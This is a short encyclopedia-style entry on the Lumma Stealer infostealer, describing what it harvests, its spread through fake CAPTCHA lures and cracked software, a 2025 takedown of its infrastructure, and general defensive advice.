Skip to content
MalwareWiki

Infostealer

Lumma Stealer

aka LummaC2

A dominant subscription infostealer of 2023–2025 spread via fake CAPTCHA and cracked software, disrupted by a Microsoft-led takedown in 2025.

Lumma Stealer (LummaC2) was one of the most prevalent infostealers of 2023–2025, sold as a tiered subscription service. It harvests browser credentials, cookies, autofill, 2FA data and cryptocurrency wallets, and can pull down further payloads.

Mass distribution

Lumma scaled through fake CAPTCHA / "ClickFix" pages that trick users into pasting malicious commands, plus cracked software and malvertising. Its stolen logs fed account takeover and ransomware crews at enormous volume.

2025 disruption

In May 2025, a Microsoft-led operation with law enforcement seized thousands of Lumma domains and disrupted its infrastructure. Stealer markets are resilient, so successors are expected. Campaign data is on Cyber Breaches; a ClickFix-delivery analysis lives on the Reverse Engineering Hub.

Defense

Train users against "paste this command" lures, block untrusted executables, enforce phishing-resistant MFA, and expire sessions.